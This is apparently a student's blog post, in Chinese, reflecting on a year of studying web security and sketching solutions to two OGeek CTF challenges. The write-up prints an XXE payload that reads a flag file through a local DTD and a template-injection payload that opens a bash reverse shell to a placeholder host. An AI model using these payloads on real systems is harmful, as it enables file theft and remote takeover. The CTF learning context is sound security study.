OGeek线上赛兼一学年总结

​ 上个月月末,工作室的学长们带着打了一场oppo的比赛,才发现自己原来菜的那么真实。。。任重而道远吧。想着开学没过多久,就对之前一年的生活做一个总结。虽然院里成绩尚可(专业排名第五?),但是还是在游戏和午休上浪费了不少的学习时间,当初要是能把这些时间用到复习上,或许能冲冲国家奖学金了= =。当然,去年的遗憾希望今年别再发生。

​ 去年运气很好,在接触Acm和网络安全之后,毅然选择了安全这条路。工作室的学长也很用心的教萌新,我很感激,无奈自己太菜=,学了忘忘了学,无限轮回中。。。这一年学了挺多东西,PHP、HTML、CSS、Linux、常见漏洞的注入、以及一些基础的网络安全知识。上学期的院赛,勉强排到第七,下学期的院赛就进到了第二名,看到自己在进步,还是挺高兴的。

​ 再就是对这次比赛部分题目的解题思路进行描述。

LookAround

​ 点击URL,出现了一个类似时钟的JS页面。

1

​ 查看源代码,发现每十秒发送一次POST型XML请求。大师傅们一看到这个XML,就联想到XXE。简单来说,XXE就是XML外部实体注入,当允许引用外部实体时,通过构造恶意内容,就可能导致任意文件读取、系统命令执行、内网端口探测、攻击内网网站等危害。

​ 例如,如果你当前使用的程序为PHP,则可以将libxml_disable_entity_loader设置为TRUE来禁用外部实体,从而起到防御的目的。

2

​ 外部文档类型定义(DTD)文件可被用于触发OOB XXE。攻击者将.dtd文件托管在VPS上,使远程易受攻击的服务器获取该文件并执行其中的恶意命令。所以我们可以在本地根据题目的提示,下载同名镜像,创建容器后找DTD。

payload如下:

1
<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE ROOT [<!ENTITY % local_dtd SYSTEM "file:///usr/share/xml/fontconfig/fonts.dtd"><!ENTITY % expr 'aaa)><!ENTITY &#x25; file SYSTEM "file:///flag"><!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM &#x27;file:///&#x25;file;&#x27;>">&#x25;eval;&#x25;error;'>%local_dtd;]>

Render

知识点:SSTI模板注入

4

自己没咋接触过SSTI模板注入,就先贴上大师傅的pyload:

1
<p th:text='${T(java.lang.Runtime).getRuntime().exec(new String[]{"/bin/bash","-c","sh -i >& /dev/tcp/ip/port 0>&1"})}' />

题目太难,自己太菜,日后再来补笔记(ง •_•)ง

Author: De-m0n
Link: http://De-m0n.github.io/2019/09/09/ogeek/
Copyright Notice: All articles in this blog are licensed under CC BY-NC-SA 4.0 unless stating additionally.
Donate
  • 微信
  • 支付寶
Catalog